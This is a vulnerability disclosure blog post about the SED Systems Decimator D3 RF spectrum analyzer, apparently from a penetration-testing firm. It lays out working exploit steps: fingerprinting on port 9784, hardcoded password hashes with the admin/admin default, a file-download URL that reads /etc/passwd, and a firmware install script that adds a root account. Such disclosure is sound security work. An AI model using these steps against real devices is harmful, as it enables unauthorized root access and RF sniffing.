During a recent penetration test, MDSec found several vulnerabilities in a RF spectrum analyzer that was exposed to the Internet. The SED Systems Decimator D3 is the third generation of SED’s popular Decimator spectrum analyzer, providing a frequency range of 5MHz to 3GHz and lightning fast measurement refresh rate. More information on Sed Systems Decimator D3 devices can be found at the vendor’s website.

Identification of the vulnerable device can be performed by scanning for TCP port 9784 which offers a default remote API. When connected to this service it will announce itself with “connected” similar to the following output:

[code lang=”bash”]Connected to x.x.x.x.

Escape character is ‘^]’.

connected

status

status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0

ping

ping:ok[/code]

The web service by default has a user interface for accessing the RF analyzer capability. Using the API, the device can also give raw remote access to I/Q samples which would provide a means to remotely sniff the RF spectrum. The Web Configuration Manager can be found under the “/cgi-bin/wcm.cgi” URI. Firmware for the device was downloaded and several vulnerabilities were found to be present within the device services.

Firstly, the device was shipped with hardcoded credentials and had existed in the default firmware since at least February 2013. The following entries can be found in the “/etc/passwd” file:

[code lang=”bash”]root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh

admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly[/code]

While the admin user has a default password of “admin” at this time the root user’s password is unknown, however there is no documented way of changing this trivially in a device. Using the “admin” user it was possible to obtain a web session to the Web Configuration Manager application and exploit a hidden arbitary file download vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file from the device due to the “admin” user having equivalent root privileges. To execute arbitary code a third vulnerability was exploited, this time within the firmware flashing routine. By uploading a crafted tarball that contains a “install” script in its root, the device will accept your firmware and then attempt to execute “./install”. To prevent bricking/modification of the device, the flashing process can then be subsequently canceled. The vulnerability exist in the “/usr/bin/install_flash” command, which after using “tar” to unpack an archive to a tmp folder of “/tmp/PID_of_tar” does the following:

[code lang=”bash”]80 # If the archive contained its own install script then use that

81

82 if [ -x ./install ]; then

83 ./install $all_args

84 rc=$?

85 exit $rc

86 fi

87[/code]

Using this vulnerability it is possible to upload a “.tar” file containing an “install” file that looks like the following to obtain a root user account with “adm1n/admin”:

[code lang=”bash”]cat install

#!/bin/sh

echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd[/code]

Using the newly created account it is possible to now SSH remotely to the device as PermitRootLogin is enabled by default. The screen shot below shows successful exploitation of this weakness to obtain remote root privileges:

MDSec have since provided details of these vulnerabilities to the manufacturer who have updated and released a new firmware image which is intended to address these weaknesses. The new firmware patches have not been verified however it is advised that all users of SED Systems D3 decimator devices update to the latest firmware version to prevent exploitation of these weaknesses by malicious parties.

This blog post was written by @hackerfantastic.